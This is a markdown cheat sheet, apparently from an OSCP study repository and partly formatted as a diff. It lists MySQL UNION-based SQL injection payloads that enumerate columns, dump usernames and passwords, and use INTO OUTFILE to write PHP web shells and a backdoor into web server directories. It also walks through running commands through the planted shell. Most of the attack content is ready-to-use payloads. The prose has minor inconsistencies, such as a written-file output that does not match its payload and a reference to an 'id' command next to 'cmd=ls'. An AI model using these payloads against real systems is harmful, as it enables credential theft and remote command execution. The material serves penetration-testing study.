wint3rmuted/Playlists-Cheatsheets/OSCPFLOW/SQLi/sqli-master.md

 ' union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'  // Fetch Column names from Table
 ' UNION SELECT 1,group_concat(user,0x3a,pasword),3 from users limit 0,1-- -  // Dump data from Columns using 0x3a as seperator
 ' union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'   // Backdoor
+' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- // Write a WebShell To Disk via INTO OUTFILE directive.
+192.168.191.x/tmp/webshell.php?cmd=ls

+Although the various MySQL database variants don't offer a single function to escalate to RCE, we can abuse the SELECT INTO_OUTFILE statement to write files on the web server.
+For this attack to work, the file location (var/www/html/tmp/webshell.php) must be writable to the OS user running the database software.

+We'll issue the UNION SELECT SQL keywords to include a single PHP line into the first column and save it as webshell.php in a writable web folder.
+Write a WebShell To Disk via INTO OUTFILE directive:
+' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //

+The written PHP code file results in the following:
+<? system($_REQUEST['cmd']); ?>
+PHP reverse shell

+The PHP system function will parse any statement included in the cmd parameter coming from the client HTTP REQUEST, thus acting like a web-interactive command shell.
+If we try to use the above payload inside the Lookup field of the search.php endpoint, we receive the following error:

+Fortunately, this error is related to the incorrect return type, and should not impact writing the webshell on disk.
+To confirm, we can access the newly created webshell inside the tmp folder along with the id command.

+192.168.191.x/tmp/webshell.php?cmd=ls

+The webshell is working as expected, since the output of the id command is returned to us through the web browser.
+We discovered that we are executing commands as the www-data user, an identity commonly associated with web servers on Linux systems.

 ```

 # Post-Methods